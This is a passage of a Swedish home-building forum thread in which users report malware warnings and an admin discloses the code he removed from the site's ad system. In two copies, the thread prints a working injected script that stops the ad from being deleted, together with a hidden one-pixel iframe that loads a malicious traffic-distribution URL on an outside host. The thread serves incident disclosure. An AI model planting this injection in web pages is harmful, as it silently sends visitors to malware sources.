trojan
I mitt fall ville sidan starta Windows Media Player och spela låten "The Show must go on".
/Jörgen
/Jörgen
Min webläsare (chrome) varnade för att det var hänvisningar till samma sida som på bilden, men jag valde "fortsätt ändå", och ingenting hände...
Samma här, Chrome ger nedanstående text verkar mest dyka upp då jag går in i Verktygsforumet
Varning: Din dator kan skadas om du besöker den här webbplatsen!
Webbplatsen på www.byggahus.se innehåller komponenter från webbplatsen www.nbvhhdtn321.com som verkar innehålla skadliga program, dvs. program som kan skada datorn eller köras utan ditt tillstånd. Det kan räcka med att besöka en webbplats med skadliga program för att datorn ska infekteras.
Detaljerad information om problemen med dessa komponenter finns på Google Diagnostiksida för Säker bläddring för www.nbvhhdtn321.com.
Läs mer om hur du kan skydda dig mot skadlig programvara online.
Jag är medveten om att min dator kan skadas om jag besöker den här webbplatsen.
Varning: Din dator kan skadas om du besöker den här webbplatsen!
Webbplatsen på www.byggahus.se innehåller komponenter från webbplatsen www.nbvhhdtn321.com som verkar innehålla skadliga program, dvs. program som kan skada datorn eller köras utan ditt tillstånd. Det kan räcka med att besöka en webbplats med skadliga program för att datorn ska infekteras.
Detaljerad information om problemen med dessa komponenter finns på Google Diagnostiksida för Säker bläddring för www.nbvhhdtn321.com.
Läs mer om hur du kan skydda dig mot skadlig programvara online.
Jag är medveten om att min dator kan skadas om jag besöker den här webbplatsen.
Thomas59
Byggveteran
· Stockholms län
· 3 313 inlägg
Thomas59
Byggveteran
- Stockholms län
- 3 313 inlägg
Samma här. COMODO varnar för trojan och W Media Player drar igång. Flera timmar har gått sedan första inlägget och fortfarande ingen reaktion från ADMIN. Sådana här saker måste hanteras OMGÅENDE.
Tjosan, admin liksom många andra svenskar har inte jobbat så mycket idag. Jag har börjat försöka reda ut härvan som uppstått, och tror jag vet var den här illasinnade koden kommer ifrån. Nu handlar det bara om att bli av med den så fort som möjligt.
Thomas59
Byggveteran
· Stockholms län
· 3 313 inlägg
Thomas59
Byggveteran
- Stockholms län
- 3 313 inlägg
Det vore ju bra (minst sagt:@) om du gav lite info avseende vad det var för "elak kod" som smugit sig in på siten och vad en "drabbad" besökare ska/bör vidtaga för åtgärder.flommy skrev:
Att bara meddela att koden är borta räcker inte:@.
Det här är koden jag tog bort ur vårt annonssystem, där den har spridits:
<script type="text/javascript">window.onload=function(){var aht=new Array();var aht=document.getElementsByTagName('*');for(var i=0;i<aht.length;i++){if(aht.name=='append'){aht.value='';}if(aht.name=='submitbutton'){aht.onclick=function(){return false;}}}}</script> <noscript><style type="text/css">.code{display:none;}</style></noscript> <iframe src="http://www.etdghsnu321.com/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="no" scrolling="no"></iframe>
Kortfattat så gör det första av koden att man inte kan ta bort den från annonsadministrationen och den andra delen lägger in en <iframe> på sidan, som i princip gör att man har besökt hxxp://www.etdghsnu321.com/tds/in.cgi?default varje gång man har varit inne på byggahus.se mellan kl 12 och 22 idag.
Det är svårt att säga vilka åtgärder man kan vidta som drabbad forumbesökare. Se det som att ni har stavat fel till någon känd webbaddress och hamnat på någon skum fake sida. Jag tror inte att man behöver oroa sig så mycket, eftersom man inte hamnat på någon sida som verkar vara byggahus och som vill att man ska skriva in sin information. Annars kan det vara något försök att sprida malware, men det är de flesta webbläsare skyddade mot idag vad jag vet.
<script type="text/javascript">window.onload=function(){var aht=new Array();var aht=document.getElementsByTagName('*');for(var i=0;i<aht.length;i++){if(aht.name=='append'){aht.value='';}if(aht.name=='submitbutton'){aht.onclick=function(){return false;}}}}</script> <noscript><style type="text/css">.code{display:none;}</style></noscript> <iframe src="http://www.etdghsnu321.com/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="no" scrolling="no"></iframe>
Kortfattat så gör det första av koden att man inte kan ta bort den från annonsadministrationen och den andra delen lägger in en <iframe> på sidan, som i princip gör att man har besökt hxxp://www.etdghsnu321.com/tds/in.cgi?default varje gång man har varit inne på byggahus.se mellan kl 12 och 22 idag.
Det är svårt att säga vilka åtgärder man kan vidta som drabbad forumbesökare. Se det som att ni har stavat fel till någon känd webbaddress och hamnat på någon skum fake sida. Jag tror inte att man behöver oroa sig så mycket, eftersom man inte hamnat på någon sida som verkar vara byggahus och som vill att man ska skriva in sin information. Annars kan det vara något försök att sprida malware, men det är de flesta webbläsare skyddade mot idag vad jag vet.